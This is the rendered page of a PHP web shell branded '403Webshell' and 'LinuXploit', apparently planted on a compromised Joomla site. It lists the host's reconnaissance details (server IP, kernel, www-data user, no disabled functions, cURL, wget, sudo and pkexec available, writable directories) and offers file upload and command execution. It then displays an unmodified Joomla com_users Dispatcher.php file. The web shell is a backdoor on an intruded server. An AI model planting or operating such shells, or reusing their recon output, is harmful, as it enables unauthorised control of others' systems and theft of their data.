403Webshell
Server IP : 104.21.84.107  /  Your IP : 104.23.243.196
Web Server : Apache/2.4.63 (Ubuntu)
System : Linux adminpruebas-Virtual-Machine 6.14.0-37-generic #37-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 22:10:32 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.4.5
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/fcarn/administrator/components/com_users/src/Dispatcher/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/fcarn/administrator/components/com_users/src/Dispatcher/Dispatcher.php
<?php

/**
 * @package         Joomla.Administrator
 * @subpackage      com_users
 *
 * @copyright   (C) 2021 Open Source Matters, Inc. <https://www.joomla.org>
 * @license         GNU General Public License version 2 or later; see LICENSE.txt
 */

namespace Joomla\Component\Users\Administrator\Dispatcher;

use Joomla\CMS\Dispatcher\ComponentDispatcher;

// phpcs:disable PSR1.Files.SideEffects
\defined('_JEXEC') or die;
// phpcs:enable PSR1.Files.SideEffects

/**
 * ComponentDispatcher class for com_users
 *
 * @since  4.0.0
 */
class Dispatcher extends ComponentDispatcher
{
    /**
     * Override checkAccess to allow users edit profile without having to have core.manager permission
     *
     * @return  void
     *
     * @since  4.0.0
     */
    protected function checkAccess()
    {
        $task         = $this->input->getCmd('task');
        $view         = $this->input->getCmd('view');
        $layout       = $this->input->getCmd('layout');
        $allowedTasks = ['user.edit', 'user.apply', 'user.save', 'user.cancel'];

        // Allow users to edit their own account
        if (\in_array($task, $allowedTasks, true) || ($view === 'user' && $layout === 'edit')) {
            $user = $this->app->getIdentity();
            $id   = $this->input->getInt('id');

            if ((int) $user->id === $id) {
                return;
            }
        }

        /**
         * Special case: Multi-factor Authentication
         *
         * We allow access to all MFA views and tasks. Access control for MFA tasks is performed in
         * the Controllers since what is allowed depends on who is logged in and whose account you
         * are trying to modify. Implementing these checks in the Dispatcher would violate the
         * separation of concerns.
         */
        $allowedViews  = ['callback', 'captive', 'method', 'methods'];
        $isAllowedTask = array_reduce(
            $allowedViews,
            function ($carry, $taskPrefix) use ($task) {
                return $carry || str_starts_with($task ?? '', $taskPrefix . '.');
            },
            false
        );

        if (\in_array(strtolower($view ?? ''), $allowedViews) || $isAllowedTask) {
            return;
        }

        parent::checkAccess();
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit